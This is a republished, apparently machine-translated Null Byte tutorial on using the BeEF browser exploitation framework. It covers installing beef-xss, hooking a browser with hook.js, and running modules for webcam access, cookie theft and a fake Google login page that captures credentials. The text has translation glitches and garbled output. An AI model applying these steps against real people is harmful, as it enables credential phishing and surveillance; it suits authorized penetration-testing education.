قالب وردپرس درنا توس
Home / Tips and Tricks / Hack web browsers with BeEF to manage webcams, Phish for credentials and more «Null Byte :: WonderHowTo

Hack web browsers with BeEF to manage webcams, Phish for credentials and more «Null Byte :: WonderHowTo



People use browsers for all kinds of things and we generally entrust a lot of personal information to them. Therefore, browsers are a perfect attack surface for a hacker, because the target may not even know they are infected and will give you all the information you want.

To do this, you must first trick the user into clicking a link. To generate the link, you can use a tool called BeEF that was pre-installed on Kali Linux.

Like Metasploit, BeEF, which stands for Browser Exploitation Framework, is a framework for launching attacks. Unlike Metasploit, it is specific for launching attacks on web browsers. In some cases, we could use BeEF in combination with Metasploit to launch more advanced attack scenarios.

The tool was developed by a group of developers led by Wade Alcorn . Built on the well-known Ruby on Rails platform, BeEF is designed to investigate and test vulnerabilities in browsers. Notably, BeEF is an excellent platform for testing a browser's vulnerability to cross-site scripting (XSS) and other injection attacks.

BeEF can generate a link that can track the target and even run modules to both escalate permissions and gather more information about the person behind the computer. It can even scan behind the network the person is on, which is quite impressive because their webcam allows you to take photos, see what they are typing and open phishing pages to get credentials.

Step 1: Install BeEF [19659007] BeEF is built directly into Kali Linux 2019.2 and older, so you don't need to install anything if you use one of those versions on your computer.

In mid-2019, Kali removed BeEF as a preinstalled exploitation tool, moving it from "kali-linux-default" to the "kali-linux-large" meta package. That means that if you install a new version of Kali, you would no longer have BeEF, but you could keep it if you just update your older version of Kali to 2019.3 or higher.

If you already have it, use the following command to update everything. And if you don't have it, the same command will install it. Make sure to use beef-xss and not "beef" because the latter is a programming language interpreter, which is different. (We made that mistake in our video above, so don't do the same thing.)

  ~ $ sudo apt install beef-xss 

Whether you installed it beforehand or had to install it, the rest is the same.

Step 2: Open the BeEF service

Once BeEF is installed, you can find it under Applications -> System Services and then click on "beef start". A terminal window will open to start the service.

If you don't see beef related tools in that folder, or if you don't If you don't see that folder at all, you may have "beef" and not "beef-xss" installed, so make sure you do the latter. (You can also start BeEF from the Exploitation Tools folder where the "beef xss framework" is.)

> Run "sudo beef-xss"
[sudo] password for kali:

[-] You use the standard references
[-] (Password must be different from "beef")
[-] Type a new password for the beef user:

[*] Wait for the BeEF service to start.
[*]
[*]   You may need to refresh your browser once it is opened.
[*]
[*]   Web UI: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src = "http: // : 3000 / hook.js"> 
[*]   Example: 

  ● beef-xss.service - LSB: BeEF
Loaded: loaded (/etc/init.d/beef-xss; generated)
Active: active (active) since Fri 2020-05-08 12:51:38 EDT; 5s ago
Documents: man: systemd-sysv-generator (8)
Process: 1432 ExecStart + / etc / init.d / beef-xss start (code = excited, status = 0 / SUCCESS)
Tasks: 10 (limit: 6715)
Memory: 140.8 million
CGroup: /system.slice/beef-xss.service
14─1438 ruby ​​/ usr / share / beef-xss / beef

08 May 12:51:42 kali beef [1]: Start LSB: BeEF ...
May 08, 12:51:42 pm kali beef [1]: Started LSB: BeEF.

[*] Open Web UI (http://127.0.0.1:3000/ui/panel) in: 5 ... 4 ... 3 ... 2 ... 1 ... 

If you come across As If your browser does not load, you can work around the problem by opening your favorite web browser, such as Firefox or Chrome, and going to the following URL, which is for the localhost (127.0.0.1) web server on port 3000. [19659010] http://127.0.0.1:3000/ui/panel

Step 3: Log in to the BeEF service

Once the browser interface opens, you must log in to the BeEF service. The default references are beef for the username and beef for the password. However, you may be asked to create a password for your beef session (as seen above), in which case you would use beef as the username and whatever password you choose.

After successful login you should see the "Getting Started" page with information on how BeEF works. On the left is the column Hooked Browsers where all browsers you manage end up.

Step 4: Hook the Target Browser

The key to success with BeEF is "hooking" a browser. This basically means that we need the goal to visit a vulnerable web app with the "hook.js" JavaScript file. To practice, BeEF provides a web page for your localhost with the payload in it, so visit it to see how it works.

  http://127.0.0.1:3000/demos/basic.html 

The code injected into the linked browser responds to commands from the BeEF server that we manage. From there, we can do a lot of naughty things on the target's computer.

Step 5: View the Browser Data

I have some addicted browsers, but I'm going to look at the Chrome browser. Click on your linked browser and you will be taken to the "Details" tab, which provides information about the linked browser. Mine appears as Chrome in the values.

This tab will show you much more than that. I see that the platform is Linux x86_64; that it has the Chrome PDF Plugin, Chrome PDF Viewer and Native Client plugins; the components include webgl, webrtc and websocket; and other interesting information.

Step 6: Run commands in the browser

Now that we have connected the target's browser, we can get some of the built-in modules from the "Commands" tab.

There are over 300 modules, from browser hacks to social engineering, including, but by no means limited to:

  • Retrieve domains visited ( browser)
  • Retrieve visited URLs (browser)
  • Webcam (browser)
  • Retrieve all cookies (extension)
  • Grab Google contacts (extension)
  • Screenshot (extension) [19659039] Steal Autocomplete (social engineering)
  • Google Phishing (social engineering)

When you find a module you want to use, select it and then click "Run" below the description. For example, I'm going to use the "Google Phishing" module in the "Social Engineering" folder.

After running it, a fake Gmail login page appears in the linked browser. The user doesn't have to think long about entering their username and password, and once they do, we log it in. Then they are sent back to the Google site as if they log in regularly.

To find the Username and Password we have logged in, click the command in the column Results History Module . For me, I see "hfhfhf" as a user and "sdliasdflihasdflh" as a password. You can also view this information in the "Logs" tab.

If we wanted, we could change the URL using the Google Phishing module, if you want to use something more credible than the old Gmail interface .

Once we plug in the browser, there are almost unlimited possibilities for what we can do. You can even use BeEF for operating system attacks. Watch our Cyber ​​Weapons Lab video above for more examples of what BeEF can help you achieve, such as accessing the webcam and tracking keystrokes.

BeEF is a powerful web browser attack tool

BeEF is an extraordinary and powerful tool for exploiting web browsers, and it is a terrifying example of why you should never click on suspicious links. Even if everything looks good, you have to be very careful with everything that appears in your browser for permission to access your webcam or audio or for which you need to enter account information.

Want to make money as a white hat hacker? Start your White Hat hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from Ethical Hacking Professionals.

Buy Now (96% Off)>

Cover Photo and Screenshots of Justin Meyers / Null Byte




Source link